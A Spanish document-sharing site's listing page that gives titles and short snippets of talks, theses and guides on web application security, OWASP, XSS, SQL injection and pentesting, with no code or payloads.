Seguridad en Aplicaciones Web

Seguridad en Aplicaciones Web Seguridad en Aplicaciones Web Juan Isaias Calderón CISSP, GCFA, ECSA, CEH, MCP jcalderon@trustwave.com SpiderLabs Lámina 1 Dr. Roberto Gómez C. Inseguridad de las aplicaciones Web De 300 sites auditados

Más detalles

Ataques más comunes. Virginia Armas Alejandro Do Nascimiento

Ataques más comunes. Virginia Armas Alejandro Do Nascimiento Ataques más comunes Virginia Armas Alejandro Do Nascimiento 1 Introducción Los ataques a desarrollar en la exposición son: HTTP Tunneling Suplantación de contenido Local File Inclusion Remote File Inclusion

Más detalles

Soluciones para Seguridad Riesgo y Cumplimiento (GRC) Portafolio Oracle para optimizar el cumplimiento de normas y la eliminación del Riesgo

Soluciones para Seguridad Riesgo y Cumplimiento (GRC) Portafolio Oracle para optimizar el cumplimiento de normas y la eliminación del Riesgo Soluciones para Seguridad Riesgo y Cumplimiento (GRC) Portafolio Oracle para optimizar el cumplimiento de normas y la eliminación del Riesgo MSc. Lina Forero Gerente de Consultoría Junio 2010 La Seguridad

Más detalles

Programación de código seguro

Programación de código seguro Programación de código seguro Distinción de vulnerabilidades Stack OverFlow y Heap OverFlow Comunes en lenguajes y aplicaciones de escritorio TOP 10 OWASP Muchas otras Stack OverFlow Stack OverFlow: Ejemplo

Más detalles

Usando OWASP para cumplir PCI-DSS

Usando OWASP para cumplir PCI-DSS AppSec Latam 11 The OWASP Foundation Usando OWASP para cumplir PCI-DSS Mauro Flores OWASP Global Industry Committee OWASP PCI Project OWASP Uruguay Chapter Co-Leader Mauro.flores@owasp.org @mauro_fcib

Más detalles

Seguridad en aplicaciones web en el ámbito de la e-administración. Problemas más comunes y principales contramedidas

Seguridad en aplicaciones web en el ámbito de la e-administración. Problemas más comunes y principales contramedidas Problemas más comunes y principales contramedidas Seguridad en aplicaciones web Problemas más comunes y principales contramedidas Fernando de la Villa Gerente de Soluciones Area Seguridad Mnemo Evolution

Más detalles

Ataques XSS en Aplicaciones Web

Ataques XSS en Aplicaciones Web Ataques XSS en Aplicaciones Web Education Project Antonio Rodríguez Romero Consultor de Seguridad Grupo isoluciones antonio.rodriguez@isoluciones.es Copyright 2007 The Foundation Permission is granted

Más detalles

Tecnologías Aplicadas al Dominio "Desarrollo, Adquisición y Mantenimiento de los Sistemas de Información"

Tecnologías Aplicadas al Dominio Desarrollo, Adquisición y Mantenimiento de los Sistemas de Información Tecnologías Aplicadas al Dominio "Desarrollo, Adquisición y Mantenimiento de los Sistemas de Información" No nos va a pasar nosotros Riesgo en Aplicaciones y Sistemas de Información Malas prácticas de

Más detalles

Tendencias en Seguridad y Control en Aplicaciones

Tendencias en Seguridad y Control en Aplicaciones Tendencias en Seguridad y Control en Aplicaciones Lucio Augusto Molina Focazzio Certified information Systems Auditor - CISA Certified Information Security Manager CISM CobiT Accredited Trainer Consultor

Más detalles

Auditoría de Seguridad

Auditoría de Seguridad Auditoría de Seguridad Introducción Tipos auditoría Externa Caja Negra Interna Caja Blanca Informes Valoración sistema Oferta y Tarificación Recursos Formación - certificaciones Auditoría de Seguridad

Más detalles

LBSEC. http://www.liveboxcloud.com

LBSEC. http://www.liveboxcloud.com 2014 LBSEC http://www.liveboxcloud.com LiveBox Srl no asume responsabilidades o garantías sobre el contenido y uso de ésta documentación y declina cualquier garantía explicita o implícita de comercialidad

Más detalles

OWASP y el cumplimiento normativo: PCI-DSS y PA-DSS OWASP. The OWASP Foundation

OWASP y el cumplimiento normativo: PCI-DSS y PA-DSS OWASP. The OWASP Foundation y el cumplimiento normativo: PCI-DSS y PA-DSS 13/09/2011 Juan Jose Rider Jimenez member Spain Chapter Juan.Rider@owasp.org Copyright The Foundation Permission is granted to copy, distribute and/or modify

Más detalles

Seguridad en el desarrollo

Seguridad en el desarrollo OWASP Latam Tour Venezuela 2013 Seguridad en el desarrollo Mateo Martínez, CISSP mateo.martinez@owasp.org OWASP Uruguay Comité Global de Industrias de OWASP Agenda Agenda Introducción Seguridad en el ciclo

Más detalles

Seguridad en Sitios Web de Alto Tráfico. Ing. Enrique Hurtarte Juárez

Seguridad en Sitios Web de Alto Tráfico. Ing. Enrique Hurtarte Juárez Seguridad en Sitios Web de Alto Tráfico Ing. Enrique Hurtarte Juárez Guatemala, 24 de Julio de 2014 XumaK Quienes somos XumaK es una empresa que fue fundada en 2003 por Marcos Andres como una de las primeras

Más detalles

CodeSeeker Un Firewall de Nivel 7 OpenSource

CodeSeeker Un Firewall de Nivel 7 OpenSource Índice OWASP Proyectos de la OWASP: Desarrollo Documentación oportal VulnXML WAS-XML WebGoat Conceptos de Redes TCP/IP Firewalls Tipos de Firewalls CodeSeeker Funcionalidades actuales Funcionalidades futuras

Más detalles

Sesión 13. Seguridad en la web. Luisa Fernanda Rincón Pérez 2015-1

Sesión 13. Seguridad en la web. Luisa Fernanda Rincón Pérez 2015-1 Sesión 13. Seguridad en la web Luisa Fernanda Rincón Pérez 2015-1 Qué vimos la clase pasada? 1. Características de MongoDB 2. Colecciones - documentos 3. Consulta, inserción, modificación, eliminación

Más detalles

ANÁLISIS DE RIESGOS DE LAS APLICACIONES WEB DE LA SUPERINTENDENCIA DE BANCOS Y SEGUROS, UTILIZANDO LAS RECOMENDACIONES TOP TEN DE OWASP.

ANÁLISIS DE RIESGOS DE LAS APLICACIONES WEB DE LA SUPERINTENDENCIA DE BANCOS Y SEGUROS, UTILIZANDO LAS RECOMENDACIONES TOP TEN DE OWASP. ANÁLISIS DE RIESGOS DE LAS APLICACIONES WEB DE LA SUPERINTENDENCIA DE BANCOS Y SEGUROS, UTILIZANDO LAS RECOMENDACIONES TOP TEN DE OWASP. Lenin Salgado, Mario Ron, Fernando Solis Universidad de las Fuerzas

Más detalles

Medidas preventivas para evitar el robo de datos. José Manuel Rodriguez Sales Manager Seguridad Oracle Iberica

Medidas preventivas para evitar el robo de datos. José Manuel Rodriguez Sales Manager Seguridad Oracle Iberica Medidas preventivas para evitar el robo de datos. José Manuel Rodriguez Sales Manager Seguridad Oracle Iberica This document is for informational purposes. It is not a commitment to deliver any material,

Más detalles

AUDITORÍAS TÉCNICAS PARA LA CERTIFICACIÓN DE LOS SISTEMAS DE RECOGIDA DE INICIATIVAS CIUDADANAS EUROPEAS

AUDITORÍAS TÉCNICAS PARA LA CERTIFICACIÓN DE LOS SISTEMAS DE RECOGIDA DE INICIATIVAS CIUDADANAS EUROPEAS AUDITORÍAS TÉCNICAS PARA LA CERTIFICACIÓN DE LOS SISTEMAS DE RECOGIDA DE INICIATIVAS CIUDADANAS EUROPEAS Las auditorias técnicas según el Reglamento 211/2011 de la Unión Europea y según el Reglamento de

Más detalles

Introducción a OWASP OWASP. The OWASP Foundation http://www.owasp.org

Introducción a OWASP OWASP. The OWASP Foundation http://www.owasp.org Introducción a Ing. Camilo Fernandez Consultor en Seguridad Informática Octubre, 2010 cfernandez@develsecurity.com Copyright 2004 - The Foundation Permission is granted to copy, distribute and/or modify

Más detalles

Privacy by design (PbD). Necesidades de desarrollo seguro. Daniel de los Reyes dadecal@s2grupo.es Director de desarrollo. S2 Grupo 12 de Mayo, 2011

Privacy by design (PbD). Necesidades de desarrollo seguro. Daniel de los Reyes dadecal@s2grupo.es Director de desarrollo. S2 Grupo 12 de Mayo, 2011 Privacy by design (PbD). Necesidades de desarrollo seguro. Daniel de los Reyes dadecal@s2grupo.es Director de desarrollo. S2 Grupo 12 de Mayo, 2011 Antecedentes Nueva Directiva comunitaria sobre Protección

Más detalles

Inyección SQL. Juan Manuel Espinoza Marquez juanmanuel.espinoza@gmail.com CFT San Agustín Linares -2012

Inyección SQL. Juan Manuel Espinoza Marquez juanmanuel.espinoza@gmail.com CFT San Agustín Linares -2012 Inyección SQL Juan Manuel Espinoza Marquez juanmanuel.espinoza@gmail.com CFT San Agustín Linares -2012 Introducción Una inyección SQL sucede cuando se inserta o "inyecta" un código SQL "invasor" dentro

Más detalles

SEGURIDAD SEGURIDAD. Guía de Comunicación Digital para La Administración General del Estado. Página 1 de 15

SEGURIDAD SEGURIDAD. Guía de Comunicación Digital para La Administración General del Estado. Página 1 de 15 Página 1 de 15 REQUISITOS ANTES DE TENER EL SITIO WEB 3 5. 3 5.1 INYECCIÓN DE CÓDIGO 5 5.2. SECUENCIA DE COMANDOS EN SITIOS CRUZADOS (CROSS SITE SCRIPTING XSS) 7 5.3. PÉRDIDA DE AUTENTICACIÓN Y GESTIÓN

Más detalles

Unidad 6. Seguridad en aplicaciones web Ataques a servicios y aplicaciones S E G U R I D A D D E L A I N F O R M A C I O N

Unidad 6. Seguridad en aplicaciones web Ataques a servicios y aplicaciones S E G U R I D A D D E L A I N F O R M A C I O N Unidad 6 Seguridad en aplicaciones web Ataques a servicios y aplicaciones Pen-test vs Vuln. assessment Vulnerability assessment: Proceso de identificar y cuantificar vulnerabilidades en un sistema. Penetration

Más detalles

Seguridad en el ciclo de vida del software

Seguridad en el ciclo de vida del software Seguridad en el ciclo de vida del software Pablo Miño - CISSP Agenda Importancia del software Seguridad en capas Por qué el software falla? Conceptos de seguridad Ciclo de vida Agenda Importancia del software

Más detalles

Delitos. Informáticos GUÍA DE USUARIO DELITOS INFORMÁTICOS

Delitos. Informáticos GUÍA DE USUARIO DELITOS INFORMÁTICOS GUÍA DE USUARIO DELITOS INFORMÁTICOS El uso de Internet, además de darnos mucha información, también nos ofrece algunos peligros. Al igual que nuestro mundo real, en el mundo virtual también hay gente

Más detalles

DOCS. Pautas básicas para el DESARROLLO DE PLUGINS

DOCS. Pautas básicas para el DESARROLLO DE PLUGINS Pautas básicas para el DESARROLLO DE PLUGINS ÍNDICE 1. Protección contra CSRF............................. 2. Protección XSS.................................... 3. Protección contra inyecciones SQL6...................

Más detalles

S E G U R I D A D E N A P L I C A C I O N E S W E B

S E G U R I D A D E N A P L I C A C I O N E S W E B H E R R A M I E N T A S A V A N Z A DA S D E DE S A R R O L L O D E S O F T W A R E 2 0 0 7-2 0 0 8 S E G U R I D A D E N A P L I C A C I O N E S W E B X S S Y S Q L I N J E C T I O N G R U P O 2 4 S A

Más detalles

Desarrollo de Código Seguro. Seguridad en PHP. Introducción. Register Globals

Desarrollo de Código Seguro. Seguridad en PHP. Introducción. Register Globals Desarrollo de Código Seguro 22 y 27 de Septiembre de 2004 Facultad Regional Concepción del Uruguay Universidad Tecnológica Nacional Gabriel Arellano arellanog@frcu.utn.edu.ar Seguridad en PHP Lineamientos

Más detalles

SEGURIDAD WEB. Cristian Cappo (ccappo@pol.una.py)

SEGURIDAD WEB. Cristian Cappo (ccappo@pol.una.py) SEGURIDAD WEB Maestría en TICs 2015 Énfasis Auditoría y Seguridad Informática Seguridad en aplicaciones y base de datos Cristian Cappo (ccappo@pol.una.py) NIDTEC - Núcleo de Investigación y Desarrollo

Más detalles

SEGURIDAD EN APLICATIVOS WEB

SEGURIDAD EN APLICATIVOS WEB Treball Fi de Carrera ENGINYERIA TÈCNICA EN INFORMÀTICA DE SISTEMES Facultat de Matemàtiques Universitat de Barcelona SEGURIDAD EN APLICATIVOS WEB Director: Eloi Puertas Prats Realitzado en: Departament

Más detalles

III Foro Interdisciplinario de criptolog

III Foro Interdisciplinario de criptolog CORE SECURITY TECHNOLOGIES 2006 Ataques a web applications y contramedidas III Foro Interdisciplinario de criptolog Escuela Técnica Superior - 27 de Febrero, 2006 Ezequiel Gutesman Ariel Waissbein Agenda

Más detalles

MANUAL EASYCHAIR. A) Ingresar su nombre de usuario y password, si ya tiene una cuenta registrada Ó

MANUAL EASYCHAIR. A) Ingresar su nombre de usuario y password, si ya tiene una cuenta registrada Ó MANUAL EASYCHAIR La URL para enviar su propuesta a la convocatoria es: https://easychair.org/conferences/?conf=genconciencia2015 Donde aparece la siguiente pantalla: Se encuentran dos opciones: A) Ingresar

Más detalles

Chattanooga Motors - Solicitud de Credito

Chattanooga Motors - Solicitud de Credito Chattanooga Motors - Solicitud de Credito Completa o llena la solicitud y regresala en persona o por fax. sotros mantenemos tus datos en confidencialidad. Completar una aplicacion para el comprador y otra

Más detalles

Armas del CISO Actual. OWASP Venezuela OWASP Uruguay

Armas del CISO Actual. OWASP Venezuela OWASP Uruguay Armas del CISO Actual Edgar Salazar Mateo Martínez OWASP Venezuela OWASP Uruguay OWASP 14 Años de servicio a la comunidad 170 Proyectos Activos 200 Capítulos Activos 43,000+ Participantes en listas de

Más detalles

Clase 19: 21 de Abril de 2011. Certificados Digitales (HTTPS) Eduardo Mercader Orta emercade [at] nic. cl

Clase 19: 21 de Abril de 2011. Certificados Digitales (HTTPS) Eduardo Mercader Orta emercade [at] nic. cl Taller de Administración de Servidores Linux CC5308 Clase 19: 21 de Abril de 2011 Certificados Digitales (HTTPS) Eduardo Mercader Orta emercade [at] nic. cl Copyright 2011 Creative Commons 3.0-cl by-nc-sa

Más detalles

Fundamentos y categorías de ataques LSI 2013/2014

Fundamentos y categorías de ataques LSI 2013/2014 Fundamentos y categorías de ataques LSI 2013/2014 Contenido Conceptos básicos y definiciones Categorías de ataques Servicios de seguridad Mecanismos de seguridad 2 Introducción Seguridad Informática: El

Más detalles

Día 23, Hacking ético: Auditoria web y perspectiva desde la Administración Publica

Día 23, Hacking ético: Auditoria web y perspectiva desde la Administración Publica Día 23, Hacking ético: Auditoria web y perspectiva desde la Administración Publica DANIEL FIRVIDA PEREIRA Técnico de seguridad - INTECO-CERT 23 de Noviembre 1º ENCUENTRO NACIONAL DE LA INDUSTRIA DE SEGURIDAD

Más detalles

Seguridad TI. La mejor inversión en la globalización

Seguridad TI. La mejor inversión en la globalización Seguridad TI La mejor inversión en la globalización Agenda Introducción sobre la seguridad de aplicativos OWASP top 10 PCI IBM Rational Appscan Demostración de Hackeo Administración del ciclo de vida de

Más detalles

ARE YOUR WEB VULNERABLE?

ARE YOUR WEB VULNERABLE? CROSS-SITE SITE SCRIPTING: ARE YOUR WEB APPLICATIONS VULNERABLE? Alberto Calle Alonso Sebastián Marcos Miguel Mateo de la Puente Madrid, Febrero 2009 1 ÍNDICE Introducción Cross-site scripting HTTP y HTML

Más detalles

TEMARIO. Introducción o Las evaluaciones de seguridad o El hacker ético o Metodología de ataque o Entregables o Bibliografía

TEMARIO. Introducción o Las evaluaciones de seguridad o El hacker ético o Metodología de ataque o Entregables o Bibliografía TEMARIO Introducción o Las evaluaciones de seguridad o El hacker ético o Metodología de ataque o Entregables o Bibliografía Fundamentos de seguridad de la información o Conceptos y definiciones o Fuga

Más detalles

In-seguridad y malware en dispositivos móviles

In-seguridad y malware en dispositivos móviles In-seguridad y malware en dispositivos móviles Damián Muraña damian @ murana.uy @damianmurana damianmurana@joindiaspora.com www.murana.uy Para qué usamos los móviles? 03/2013 Com. por internet E-Mail Noticias

Más detalles

AGENDA. Mejorando la Seguridad en Aplicaciones Web. Introducción. La Web Promesas y Amenazas. Asegurando la Red y el Servidor de Web

AGENDA. Mejorando la Seguridad en Aplicaciones Web. Introducción. La Web Promesas y Amenazas. Asegurando la Red y el Servidor de Web Universidad ORT Uruguay Mejorando la Seguridad en Aplicaciones Web Ing. Cecilia Belletti Ing. Angel Caffa, MSc Ing. Isaac Rodríguez IntegraTICs 7 de diciembre, 2006 AGENDA Introducción La Web Promesas

Más detalles

Pentesting con OWASP Zed Attack Proxy

Pentesting con OWASP Zed Attack Proxy Pentesting con OWASP Zed Attack Proxy 1. Introducción ZAP es una poderosa herramienta para realizar ataques de penetración (disciplina conocida como Pentesting), que permite analizar sitios web para buscar

Más detalles

fs2008 VII foro de seguridad RedIris Seguridad en Web BCN 27&&28/03

fs2008 VII foro de seguridad RedIris Seguridad en Web BCN 27&&28/03 fs2008 VII foro de seguridad RedIris Seguridad en Web BCN 27&&28/03 Vulnerabilidades Dónde están llegando las cosas... Los bancos británicos se aseguran contra el phishing: cargarán las pérdidas a los

Más detalles

SEGURIDAD EN APLICACIONES WEB LA MEJOR SOLUCIÓN DE ESCANEOPARA APLICACIONES WEB

SEGURIDAD EN APLICACIONES WEB LA MEJOR SOLUCIÓN DE ESCANEOPARA APLICACIONES WEB SWAT BROCHURE SEGURIDAD EN APLICACIONES WEB La seguridad en aplicaciones web ha sido hasta ahora un gran reto para las empresas, ya que hay muy pocas soluciones eficaces disponibles en el mercado. La primera

Más detalles

Primeras Jornadas de Seguridad Web OWASP DAY ARGENTINA 2010

Primeras Jornadas de Seguridad Web OWASP DAY ARGENTINA 2010 Primeras Jornadas de Seguridad Web OWASP DAY ARGENTINA 2010 La seguridad como ventaja competitiva Web Application: Security Tips Hernán M. Racciatti hracciatti@siclabs.com SICLABS Acerca del Autor Analista

Más detalles

Agenda. Nuestra Seguridad. Su Seguridad. Regulaciones

Agenda. Nuestra Seguridad. Su Seguridad. Regulaciones Seguridad con AWS Agenda Nuestra Seguridad Regulaciones Su Seguridad Administración de cuentas (las llaves del reino) Aislamiento de servicios Auditoria y visibilidad La seguridad es nuestra prioridad

Más detalles

http://miel.unlam.edu.ar/interno/mensajes/mensajeria.asp?idcomision=&idpersona=38527273

http://miel.unlam.edu.ar/interno/mensajes/mensajeria.asp?idcomision=&idpersona=38527273 Reporte de vulnerabilidades Materias Interactivas en Línea Nicolás Satragno Abstract El presente es un reporte de las vulnerabilidades encontradas en el sistema Materias Interactivas en Línea (MIeL) de

Más detalles

==== Introducción. ==== Buscando un fallo

==== Introducción. ==== Buscando un fallo =============================== Horde/Imp: Cross Site Scripting in Email Subject =============================== FraMe - frame at kernelpanik.org http://www.kernelpanik.org ===============================

Más detalles

un enfoque práctico en el entorno universitario

un enfoque práctico en el entorno universitario Seguridad en aplicaciones Web: un enfoque práctico en el entorno universitario Evangelino Valverde Álvarez Área de Tecnología y Comunicaciones UCLM Contexto 4 campus Ciudad Real, Albacete, Cuenca, Toledo

Más detalles

Desarrollo seguro de aplicaciones y servicios Web en ambiente Java:

Desarrollo seguro de aplicaciones y servicios Web en ambiente Java: Desarrollo seguro de aplicaciones y servicios Web en ambiente Java: mejores prácticas en la Dirección de Sistemas de la DGPE Presenta: Israel Ortega Cuevas 19/Mayo/2015 Contenido Seguridad en cómputo Seguridad

Más detalles

Impacto del ENS: Propuesta Oracle

Impacto del ENS: Propuesta Oracle Impacto del ENS: Propuesta Oracle Xavier Martorell Sales Identidad y Seguridad Objetivo del Esquema Nacional de Seguridad La finalidad del Esquema Nacional de Seguridad es la creación

Más detalles

A1-Inyección (SQL,OS Y LDPA)

A1-Inyección (SQL,OS Y LDPA) Los Diez Riesgos Más Importantes en Aplicaciones WEB Top 10-2010 A1-Inyección (SQL,OS Y LDPA) Oscar William Monsalve Luis Alberto Suarez Jorge Eliecer Betancur Diana Marcela Usuga G. Contenido Presentación

Más detalles

CAPÍTULO 2: SISTEMAS DE DETECCIÓN DE INTRUSOS

CAPÍTULO 2: SISTEMAS DE DETECCIÓN DE INTRUSOS Capítulo 2 Sistemas de Detección de Intrusos 7 CAPÍTULO 2: SISTEMAS DE DETECCIÓN DE INTRUSOS En este capítulo se definen los sistemas de detección de intrusos y su relación con los ataques basados en el

Más detalles

Ataques específicos a servidores y clientes web y medidas preventivas. Problemas de seguridad Web

Ataques específicos a servidores y clientes web y medidas preventivas. Problemas de seguridad Web Problemas de seguridad Web Ataques específicos a servidores y clientes web y medidas preventivas. junio de 2014 Problemas de seguridad Web 1 ATAQUES Consiste en aprovechar alguna debilidad o vulnerabilidad

Más detalles

TRABAJO DE EXPOSICIÓN. Control de Acceso de Usuarios Privilegiados. René Méndez David Gonzalez. Julio 2013

TRABAJO DE EXPOSICIÓN. Control de Acceso de Usuarios Privilegiados. René Méndez David Gonzalez. Julio 2013 TRABAJO DE EXPOSICIÓN Control de Acceso de Usuarios Privilegiados René Méndez David Gonzalez Julio 2013 Cláusula de confidencialidad: La información contenida en el presente documento ha sido elaborada

Más detalles

SQL INJECTION. Benitez, Marcelo Chinikailo, Cristian De la Cruz, Leonardo Klas, Julián. 66.69 Criptografía y Seguridad Informática.

SQL INJECTION. Benitez, Marcelo Chinikailo, Cristian De la Cruz, Leonardo Klas, Julián. 66.69 Criptografía y Seguridad Informática. SQL INJECTION Benitez, Marcelo Chinikailo, Cristian De la Cruz, Leonardo Klas, Julián Grupo 5 66.69 Criptografía y Seguridad Informática Introducción 2 Ataque basado en inyección de código Explota omisiones

Más detalles

Cómo comprar en la tienda en línea de UDP y cómo inscribirse a los módulos UDP

Cómo comprar en la tienda en línea de UDP y cómo inscribirse a los módulos UDP Cómo comprar en la tienda en línea de UDP y cómo inscribirse a los módulos UDP Sistema de registro y pago Este sistema está dividido en dos etapas diferentes*. Por favor, haga clic en la liga de la etapa

Más detalles

Puede cualquier empresa ser hackeada? Joel Bo Maximiliano Cittadini EDSI Trend Argentina

Puede cualquier empresa ser hackeada? Joel Bo Maximiliano Cittadini EDSI Trend Argentina Puede cualquier empresa ser hackeada? Joel Bo Maximiliano Cittadini EDSI Trend Argentina Tom Kellermann, vice president of cyber security at Trend Micro, discusses the rising threat of cyber terrorism

Más detalles

Recomendaciones de Seguridad para Web sites implementados bajo Joomla!

Recomendaciones de Seguridad para Web sites implementados bajo Joomla! Recomendaciones de Seguridad para Web sites implementados bajo Joomla! Dirigido a: Secretarías de Educación que hacen uso del servicio de Web Hosting proporcionado por el Ministerio de Educación Nacional

Más detalles

Haga clic para cambiar el estilo de título. Curso de Seguridad de la Información

Haga clic para cambiar el estilo de título. Curso de Seguridad de la Información Haga clic para cambiar el estilo de título Haga clic para modificar el estilo de texto del patrón Segundo nivel Tercer nivel Cuarto nivel Quinto nivel Curso de Seguridad de la Información Agenda Conceptos

Más detalles